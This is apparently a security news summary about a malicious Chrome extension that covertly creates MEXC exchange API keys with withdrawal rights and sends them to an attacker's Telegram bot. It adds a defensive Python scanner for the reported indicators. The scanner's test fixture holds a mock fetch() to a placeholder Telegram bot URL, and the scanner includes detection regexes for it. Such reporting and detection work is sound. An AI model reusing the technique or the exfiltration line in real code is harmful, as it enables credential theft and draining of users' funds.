Malicious Chrome Extension Exfiltrates MEXC API Keys via Telegram for Account Takeover
Security researchers reported a malicious Google Chrome extension, MEXC API Automator (pppdfgkfdemgfknfnhpkibbkabhghhfh), masquerading as a trading-automation tool for the MEXC cryptocurrency exchange. Published to the Chrome Web Store on 2025-09-01 by an actor using the alias "jorjortan142", the extension targets users who visit MEXC’s API key management page (/user/openapi) and runs a content script (script.js) inside the already-authenticated browser session to create new API keys.
The extension is designed to enable withdrawal permissions on the newly created keys while hiding that capability in the UI, then exfiltrates the API key and secret to a hardcoded Telegram bot controlled by the attacker. With these credentials, the actor can take programmatic control of affected accounts to execute trades and automate withdrawals, potentially draining balances reachable via MEXC. Socket, which published the research, stated the extension remained live on the Chrome Web Store at the time of reporting and that it had notified Google; The Hacker News amplified the findings and noted that the extension had limited observed downloads but could still enable direct financial theft from compromised accounts.

How this story unfolded
4 events from the most recent confirmed update back to the earliest known activity.
Reports confirm extension remained live on Chrome Web Store
Follow-up reporting stated that the malicious extension was still available on the Chrome Web Store at the time of disclosure, with one report noting it had 29 downloads. Researchers warned that stolen API keys could continue to provide account access even after the extension was removed unless the keys were revoked.
Socket links campaign to 'SwapSushi' infrastructure and notifies Google
In its report, Socket said it had flagged the extension as malware and notified Google, while also linking the publisher handle 'jorjortan142' to 'SwapSushi'-branded social accounts, a Telegram bot, and related infrastructure. Researchers also noted Russian-language code comments, suggesting a Russian-speaking developer, though without firm country-level attribution.
Socket identifies extension stealing MEXC API keys and enabling withdrawals
Socket's Threat Research Team discovered that the extension automatically created new MEXC API keys in logged-in browser sessions, enabled broad permissions including withdrawals, hid the withdrawal permission in the UI, and exfiltrated the access key and secret to a hardcoded Telegram bot. The stolen credentials could let attackers trade and withdraw funds without needing passwords or bypassing 2FA.
Malicious 'MEXC API Automator' extension published to Chrome Web Store
A Chrome extension named 'MEXC API Automator,' published by 'jorjortan142,' was added to the Chrome Web Store while posing as an automation tool for the MEXC cryptocurrency exchange. It was later identified as malware designed to abuse authenticated MEXC sessions.
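As an added defender-side example (not code from Socket, The Hacker News, or the extension itself), the Python script below triages an unpacked Chrome extension directory for the indicators the reports describe: the extension ID named above, a content script whose match patterns target mexc.com pages, and a hardcoded Telegram Bot API endpoint in any JavaScript file the manifest references. The sample manifest, the sample script, the placeholder bot token, the benign extension ID, and all function names are constructed for this demonstration; the only page-sourced values are the extension ID, the extension name, and the /user/openapi path.

```python
"""Triage an unpacked Chrome extension for the indicators described above.

Added example, not code from the original reports or from the extension.
Signals checked: the known extension ID from the report, a content script
whose matches target mexc.com pages, and a hardcoded Telegram Bot API URL
in any JS file the manifest references. All sample data is constructed.
"""
import json
import os
import re
import tempfile

# Extension ID named in the report; a real deployment would load IDs from a feed.
KNOWN_BAD_IDS = {"pppdfgkfdemgfknfnhpkibbkabhghhfh"}
EXCHANGE_HOST_RE = re.compile(r"mexc\.com", re.I)
# Telegram Bot API URLs embed the bot token: api.telegram.org/bot<id>:<secret>/<method>
TELEGRAM_BOT_RE = re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+", re.I)


def triage_extension(ext_dir, ext_id):
    """Return a list of human-readable findings for one extension version directory."""
    findings = []
    if ext_id in KNOWN_BAD_IDS:
        findings.append("known-bad extension id")
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    js_files = []
    for cs in manifest.get("content_scripts", []):
        if any(EXCHANGE_HOST_RE.search(m) for m in cs.get("matches", [])):
            findings.append("content script scoped to MEXC pages")
        js_files.extend(cs.get("js", []))
    # MV3 host_permissions and MV2 permissions can both carry origin patterns.
    for perm in manifest.get("host_permissions", []) + manifest.get("permissions", []):
        if "telegram.org" in perm:
            findings.append("host permission for telegram.org")
    for js in js_files:
        path = os.path.join(ext_dir, js)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            if TELEGRAM_BOT_RE.search(fh.read()):
                findings.append(f"hardcoded Telegram Bot API endpoint in {js}")
    return findings


def scan_profile(extensions_root):
    """Walk <root>/<id>/<version>/ (Chrome's Extensions layout) and map id -> findings."""
    results = {}
    for ext_id in sorted(os.listdir(extensions_root)):
        id_dir = os.path.join(extensions_root, ext_id)
        if not os.path.isdir(id_dir):
            continue
        for version in sorted(os.listdir(id_dir)):
            ext_dir = os.path.join(id_dir, version)
            if os.path.isfile(os.path.join(ext_dir, "manifest.json")):
                hits = triage_extension(ext_dir, ext_id)
                if hits:
                    results.setdefault(ext_id, []).extend(hits)
    return results


def build_sample(root, malicious=True):
    """Write a constructed extension (manifest.json + script.js) and return its directory."""
    # The benign ID below is a constructed placeholder, not a real extension.
    ext_id = "pppdfgkfdemgfknfnhpkibbkabhghhfh" if malicious else "abcdefghijklmnopabcdefghijklmnop"
    ext_dir = os.path.join(root, ext_id, "1.0_0")
    os.makedirs(ext_dir, exist_ok=True)
    manifest = {
        "manifest_version": 3,
        "name": "MEXC API Automator" if malicious else "Tab Notes (constructed)",
        "content_scripts": [{
            "matches": ["https://www.mexc.com/user/openapi*"] if malicious else ["https://example.org/*"],
            "js": ["script.js"],
        }],
    }
    # PLACEHOLDER token: the real bot token is not on the page and is not needed here.
    script = ("fetch('https://api.telegram.org/bot000000000:PLACEHOLDER_TOKEN/sendMessage');"
              if malicious else "console.log('benign');")
    with open(os.path.join(ext_dir, "manifest.json"), "w", encoding="utf-8") as fh:
        json.dump(manifest, fh)
    with open(os.path.join(ext_dir, "script.js"), "w", encoding="utf-8") as fh:
        fh.write(script)
    return ext_dir


def demo():
    """Build the two constructed samples in a temp dir and return scan_profile's result."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root, malicious=True)
        build_sample(root, malicious=False)
        return scan_profile(root)


if __name__ == "__main__":
    for ext_id, hits in demo().items():
        print(ext_id, "->", "; ".join(hits))
```

On a real host, point scan_profile at the profile's Extensions directory (for example the Default profile's Extensions folder under the Chrome user data directory) and treat any hit as a prompt to revoke the exchange API keys, since the reports note that stolen keys remain valid after the extension is removed.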
Sources
3 references tracked.
Malicious Chrome Extension Drains Crypto via Secret API Keys (securityonline.info, open source)
Malicious Chrome Extension Steals MEXC API Keys by Masquerading as Trading Tool (thehackernews.com, open source)
Malicious Chrome Extension Steals MEXC API Keys for Account Takeover (socket.dev, open source)


